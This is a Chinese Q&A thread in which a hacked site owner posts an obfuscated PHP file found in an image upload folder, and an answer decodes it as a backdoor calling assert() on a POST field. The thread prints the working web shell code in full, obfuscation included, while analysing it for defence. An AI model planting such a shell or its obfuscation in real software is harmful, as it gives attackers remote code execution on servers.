1. 首頁
  2. 問答
  3. 我上傳文件夾中的未知PHP文件,是不是惡意代碼?

我上傳文件夾中的未知PHP文件,是不是惡意代碼?

2016-11-21 102 views
0

最近我發現我的項目被黑客攻擊,並在我的圖片文件夾中找到了一個腳本,其中有一個用戶上傳圖片的目錄(使用文件輸入)。這是我在目錄中找到的腳本。我上傳文件夾中的未知PHP文件,是不是惡意代碼?

errot_db.php

<?php     
@$_="s"."s"./*-/*-*/"e"./*-/*-*/"r";     
@$_=/*-/*-*/"a"./*-/*-*/$_./*-/*-*/"t";     
@$_/*-/*-*/($/*-/*-*/{"_P"./*-/*-*/"OS"./*-/*-*/"T"}     
[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]); 
?>

來源

2016-11-21 James0325

+6

這個問題屬於security.stackexchange.com – georoot

+0

如果它不是你的代碼的人工產物,它不屬於那裏。擦掉整個輸出並重新部署已知的工作副本。 – David

+0

@georoot他們真的確實uncrappify我的wordpress類問題?你確定嗎? – PeeHaa

回答

4

此代碼隱藏下面的語句:

@assert ($_POST[025]);

這意味着它會執行PHP代碼在POST變量 「025」 發送。所以,是的,這確實是一個後門!我建議在security.stackexchange.com上詢問如何正確處理這個後果。

來源

2016-11-21 15:13:15 ChristianF

相關問題

 相關問題